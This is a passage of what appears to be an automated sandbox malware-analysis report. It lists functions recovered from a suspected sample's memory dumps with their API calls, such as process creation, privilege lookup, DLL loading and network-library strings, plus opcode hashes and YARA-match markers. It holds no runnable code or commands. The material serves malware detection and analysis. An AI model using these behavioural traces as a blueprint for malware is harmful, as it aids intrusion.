Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e16a5f6acc75bc568576471f235cb05ca2d70d5081827aef7ef4979704bfb55
Instruction ID: 0098dbe5fd7c2c200695e68dbc35c039cba3cf127736a28e152bd2339bad1be3
Opcode Fuzzy Hash: 3e16a5f6acc75bc568576471f235cb05ca2d70d5081827aef7ef4979704bfb55
Instruction Fuzzy Hash: 2790026121180056D20065694C24F07000697D4343F91C115A01445B4CCD558CA16561

Uniqueness

Uniqueness Score: -1.00%

Function 02D99840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9984A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7ef9d468712496e8f2cbe84a6eaae7264e12a5c53a188be6c93961c334a9f21
Instruction ID: 5515748a8b3295ca774d7f4bb1eb5a80309134f5dcd5179928f4b52c99ef9931
Opcode Fuzzy Hash: d7ef9d468712496e8f2cbe84a6eaae7264e12a5c53a188be6c93961c334a9f21
Instruction Fuzzy Hash: 59900261242041665545B15944149074007A7E42817D1C012A14049B0C89669C96E661

Uniqueness

Uniqueness Score: -1.00%

Function 02D99860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9986A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc9624989e35511a4f04c2031fcf68a1460c51df28f9aa798f5da14271f34e39
Instruction ID: c1ba6675298ff8ad93bc080ce556db56744c8e2bf4c1a9003e6d83f82bb2c9fd
Opcode Fuzzy Hash: cc9624989e35511a4f04c2031fcf68a1460c51df28f9aa798f5da14271f34e39
Instruction Fuzzy Hash: 8490027120100427D11161594514B07000A97D4281FD1C412A04145B8D9A968D92B161

Uniqueness

Uniqueness Score: -1.00%

Function 02D999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D999AA

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 762aa75fea8f22da3d9e86fc12f73ef779f156ed590a07b3ea565cd5465c3bb8
Instruction ID: 0349a5babb9a65718c9b74979002dbe87eb4ed90eddc91ccbb40bd9caa483ae4
Opcode Fuzzy Hash: 762aa75fea8f22da3d9e86fc12f73ef779f156ed590a07b3ea565cd5465c3bb8
Instruction Fuzzy Hash: 179002A134100456D10061594424F070006D7E5341F91C015E10545B4D8A59CC927166

Uniqueness

Uniqueness Score: -1.00%

Function 02D99910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9991A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30bb556b337eccdfa5b7cf3df72e634d6e48fe04d5b7c9aed6a7d52dd5ba5c27
Instruction ID: 7dd010adc158148dc7154680b8268d5d39a92d29110009262279834903bc1f21
Opcode Fuzzy Hash: 30bb556b337eccdfa5b7cf3df72e634d6e48fe04d5b7c9aed6a7d52dd5ba5c27
Instruction Fuzzy Hash: 519002B120100416D14071594414B47000697D4341F91C011A50545B4E8A998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 02D996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D996DA

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9a24c992c8f0594f15726c90cef8f44159c67f66a79ef8e562443b8b5e3e16b
Instruction ID: 28d9b53570b3d63b5828c770102d31e35440dee3beb22467cf4510407f8e610e
Opcode Fuzzy Hash: f9a24c992c8f0594f15726c90cef8f44159c67f66a79ef8e562443b8b5e3e16b
Instruction Fuzzy Hash: D690027120100856D10061594414F47000697E4341F91C016A01146B4D8A55CC917561

Uniqueness

Uniqueness Score: -1.00%

Function 02D996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D996EA

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 95a7f8375d1512bbdd4b390e7fd39462689c966f1e59d16c2ed01101c3760699
Instruction ID: a2e4a6d836b2b47fd55f86688c326b777ada9b48c6b868cdec5dedb3208a5778
Opcode Fuzzy Hash: 95a7f8375d1512bbdd4b390e7fd39462689c966f1e59d16c2ed01101c3760699
Instruction Fuzzy Hash: 0490027120108816D11061598414B4B000697D4341F95C411A44146B8D8AD58CD17161

Uniqueness

Uniqueness Score: -1.00%

Function 02D99650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9965A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce5217a3865ccfa5199ea697b7e372fe60150615778dc78e03012aa1c34434e8
Instruction ID: 40eeb554ab8ff9b21a7628695a98503fc9924d977c6c56071908e8694faee052
Opcode Fuzzy Hash: ce5217a3865ccfa5199ea697b7e372fe60150615778dc78e03012aa1c34434e8
Instruction Fuzzy Hash: 4D90027120504856D14071594414E47001697D4345F91C011A00546F4D9A658D95B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 02D99660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9966A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0766c2e82fe56f58728b790e99504e45b826176e8072f3348193ffc05aca66e7
Instruction ID: 40bdfe1098643cde10e33c59cece72d99af41da33af609e49462c2019141f6fd
Opcode Fuzzy Hash: 0766c2e82fe56f58728b790e99504e45b826176e8072f3348193ffc05aca66e7
Instruction Fuzzy Hash: B590027120100816D18071594414A4B000697D5341FD1C015A00156B4DCE558E9977E1

Uniqueness

Uniqueness Score: -1.00%

Function 02D99FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D99FEA

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 20aa1c7ed6285e2df41489dea25576e687508d81505b8ab75d18afcfbec52307
Instruction ID: c7c407e7acfdf815d3add1ea3343c642ee0870217ec97d83da5ac7b325abd523
Opcode Fuzzy Hash: 20aa1c7ed6285e2df41489dea25576e687508d81505b8ab75d18afcfbec52307
Instruction Fuzzy Hash: 0D90027131114416D11061598414B07000697D5241F91C411A08145B8D8AD58CD17162

Uniqueness

Uniqueness Score: -1.00%

Function 02D99780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9978A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79258cb48fb03d9746600a6b48fa7c21d54a325f73a0f05ded24d93d2a304f4a
Instruction ID: 1b7fc30a5979fe6b76ba9b0f89a2bd1adcba55ea726ca198c2fefa054243a8cf
Opcode Fuzzy Hash: 79258cb48fb03d9746600a6b48fa7c21d54a325f73a0f05ded24d93d2a304f4a
Instruction Fuzzy Hash: 8890026921300016D18071595418A0B000697D5242FD1D415A00055B8CCD558CA96361

Uniqueness

Uniqueness Score: -1.00%

Function 02D99710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9971A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e601eb63aee2bb3454909a7eb27912a93da7d39b12324eb8ef16b5e980160bcd
Instruction ID: 369c219f27d57b3ecc0411910e9c675d47d61b6857fa8e775409472fbae5b532
Opcode Fuzzy Hash: e601eb63aee2bb3454909a7eb27912a93da7d39b12324eb8ef16b5e980160bcd
Instruction Fuzzy Hash: CD90027120100416D10065995418A47000697E4341F91D011A50145B5ECAA58CD17171

Uniqueness

Uniqueness Score: -1.00%

Function 02D995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D995DA

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33efc764aa72aeaf70be7e1fbe6f94f0589e7a6e0953c34fa17a7c5ca27a3c4f
Instruction ID: 0e440b12fe01164c58930b44f49aa19d8df06108fbe7b13220e372ca24a4193d
Opcode Fuzzy Hash: 33efc764aa72aeaf70be7e1fbe6f94f0589e7a6e0953c34fa17a7c5ca27a3c4f
Instruction Fuzzy Hash: 299002A120200017410571594424A17400B97E4241B91C021E10045F0DC9658CD17165

Uniqueness

Uniqueness Score: -1.00%

Function 02D99540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D9954A

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b214335a1754b17df64e9d62434357c2d51ec1b22301be152a13066f3e2ecfb2
Instruction ID: f8540772a71f26c593c2d3dbdb92a4ec693f37630b9be11e4080abc6ce80db8b
Opcode Fuzzy Hash: b214335a1754b17df64e9d62434357c2d51ec1b22301be152a13066f3e2ecfb2
Instruction Fuzzy Hash: 97900265211000170105A5590714907004797D9391391C021F10055B0CDA618CA16161

Uniqueness

Uniqueness Score: -1.00%

Function 02846EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02846F98

Strings

wininet.dll, xrefs: 02846F4E, 02846F57
net.dll, xrefs: 02846F61, 02846FE7, 02846FBF, 02846FCB, 02846FF3

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: aab60184151efacf410a3a9913dc326cab40346eb6a29d686bf000d5e04e5062
Instruction ID: 7a6a25d23725cb1df40043c9487c538b64d02b3afc275f8578009a7a64bfacf9
Opcode Fuzzy Hash: aab60184151efacf410a3a9913dc326cab40346eb6a29d686bf000d5e04e5062
Instruction Fuzzy Hash: 4A3180B9602708ABC711DF68C8A0FA7B7B9AB48704F00851DF65AAB640E774B545CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02846EE7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02846F98

Strings

wininet.dll, xrefs: 02846F4E, 02846F57
net.dll, xrefs: 02846F61, 02846FBF, 02846FCB

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: e8be78901db4a002be66af5e12ec70b347fdc6889fa225d3de117b56b867cce9
Instruction ID: 2f3736cebd42dc449c201a1608546c35fbff012d1dc10ca6cb94a47c50b6ba54
Opcode Fuzzy Hash: e8be78901db4a002be66af5e12ec70b347fdc6889fa225d3de117b56b867cce9
Instruction Fuzzy Hash: E821D2B9602308ABD711DF68C8A0FABB7B8BB48704F00815DF61DAB640E774B545CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 028484E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02833B93), ref: 0284850D

Strings

.z`, xrefs: 028484FC, 02848508

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: c23906bec4fd80df1a185cac1bf9542b8e6d1eb431948687904836a09b8afe8e
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: BCE046B5200208ABDB18EF99DC48EA777ADEF88750F018558FE089B241CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02837216, Relevance: 3.1, APIs: 2, Instructions: 84threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372EB

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1e5a58e2c4abb2c991b05f93bcbc61f5a09436ab53ac172c5835bad3eecf6a9b
Instruction ID: 54befcb0c06072f57cb82c5b8ef94c4d778112ccff8bef40ce6b485257d86c2a
Opcode Fuzzy Hash: 1e5a58e2c4abb2c991b05f93bcbc61f5a09436ab53ac172c5835bad3eecf6a9b
Instruction Fuzzy Hash: FF112C7EA4022C77FB21EA989C01FFFB35DAB40711F040155FE08E61C1EAA0A9054AE2

Uniqueness

Uniqueness Score: -1.00%

Function 02837270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372EB

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
Instruction ID: 3f73eeee72425f95cefa0ffeb718086510a7130882a1bee943aa7603bfbcf6ec
Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
Instruction Fuzzy Hash: B601A779A8022877F721A6988C42FFE776C6B00B51F150115FF08FA1C1EAD4790547F6

Uniqueness

Uniqueness Score: -1.00%

Function 02837248, Relevance: 3.1, APIs: 2, Instructions: 53threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372EB

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 6b306089d6a60bc3edf8bf690515b29da6f79f8d896b741b68e2f16b1a563dd4
Instruction ID: c8865baa9e48c0ca4fc167150ecc8afaabdb4c860f5dd22466a66c4f2b58cca1
Opcode Fuzzy Hash: 6b306089d6a60bc3edf8bf690515b29da6f79f8d896b741b68e2f16b1a563dd4
Instruction Fuzzy Hash: 9A012B7AA8022877F72666548C41FFE77586F40B10F150458FE48FA1C0E6D4A90147E5

Uniqueness

Uniqueness Score: -1.00%

Function 028485E9, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 364dd0975eb2683162a9000bcb8ca5cc0b0073ab2330791ae3fac192b900d759
Instruction ID: 5e876f89c071301ee225988a566c36ff23710e0540a558efda3348b6dbf0db9f
Opcode Fuzzy Hash: 364dd0975eb2683162a9000bcb8ca5cc0b0073ab2330791ae3fac192b900d759
Instruction Fuzzy Hash: DD0129B5200208ABDB14EF98DC84EEB77A9EF88750F018159FA0CA7251CA31E8118BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02848515, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 028485A4

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 34d745370c19977d9155c00181a0ead3c8145578a2d9d4081011601f75ad31e9
Instruction ID: 77a36238d9a2d42f0cc4eae43484349e6e26d32638adf4eafdbf2f4983fca488
Opcode Fuzzy Hash: 34d745370c19977d9155c00181a0ead3c8145578a2d9d4081011601f75ad31e9
Instruction Fuzzy Hash: 0B0104B6210108BFDB14DFADDC80EEB77AEAF8C650F058248FA4CD7201C630E9108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02839B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02839BA2

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 47f5bf7ed400de0ca7ccb24c7d17f2f6cbdb49790e492efe10aea2522e85fe7d
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 42010CBED4020DABDB10EBA4DC41FDEB7799B44308F004195E918DB241FA71E614CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0284854D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 028485A4

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: e5bc2c8163dfd035f233500bc4259d589e48899183c3e29740ceb04ff21dffe2
Instruction ID: cd87c3ac18595ef37374820131eaaa64d492856440f9505c8301625410b00c1c
Opcode Fuzzy Hash: e5bc2c8163dfd035f233500bc4259d589e48899183c3e29740ceb04ff21dffe2
Instruction Fuzzy Hash: A601A8B6210108AFCB54DF99DC80EEB37A9AF9C354F158258FA1DD7290D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02848550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 028485A4

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: afe243bbe584691729f0f348fb0d57f9325d156419cc8642213d5d927760a6a2
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 2B01AFB6210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02847020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0283CCE0,?,?), ref: 0284705C

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
Instruction ID: 30536b5d635fafdba2a8059ab78065bd7f174b690503efdb5a3e56bb5c69980b
Opcode Fuzzy Hash: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
Instruction Fuzzy Hash: 3BE06D3B3912083BE330659DAC02FA7B29D8B95B20F150026FA0DEA2C1D995F80146A5

Uniqueness

Uniqueness Score: -1.00%

Function 02848633, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8ae5c8d622228d7db615485e686c79bb0943a2fae952be9df479586ba2e52c5b
Instruction ID: 7f78a253cf086805fe90e566e3c7ce05be0f1bf25093e9a11d5dfdad0da8fbe5
Opcode Fuzzy Hash: 8ae5c8d622228d7db615485e686c79bb0943a2fae952be9df479586ba2e52c5b
Instruction Fuzzy Hash: DAF0E5752002086FCB10DF94DC41FEB37A9DF86360F108158FD4897241C570E8118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02848640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 81ea0221c7c0da54f497a0bcbabc66ad6df70af182f61bc04496903dc7f01ded
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 57E01AB52002086BDB10EF49DC84EE737ADAF88650F018154BA0857241C930F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 028484A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02843526,?,02843C9F,02843C9F,?,02843526,?,?,?,?,?,00000000,00000000,?), ref: 028484CD

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ec63635f52e2693bbeec7ff95f537ba8d0e34db8993f8add605f515a1ad2b42b
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 6BE046B5200208ABDB14EF99DC40EA777ADEF88750F118558FE089B241CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0283D41D, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02837C73,?), ref: 0283D44B

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c031e9279cf636f97e204e0d6bdcd9aad10003145f2854817b3fe5084e567cb3
Instruction ID: 1be11058b2186a75f24c2b3ca20fb1158030aca47cf1353114c42dc8a5398ddf
Opcode Fuzzy Hash: c031e9279cf636f97e204e0d6bdcd9aad10003145f2854817b3fe5084e567cb3
Instruction Fuzzy Hash: E2D05EBE7402442AE620EBB49C12FA627959B65714F0940B4F58DD62C3DA54D1018521

Uniqueness

Uniqueness Score: -1.00%

Function 0283D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02837C73,?), ref: 0283D44B

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: c718d18164e7e6644043e2ac2ec9218d9fc4e3716c0ef2ec44448751587dddca
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 37D0A7797503083BE610FAA89C03F2672CD5B54B14F494074F94CD73C3DE54F4004562

Uniqueness

Uniqueness Score: -1.00%

Function 02848678, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670

Memory Dump Source

Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
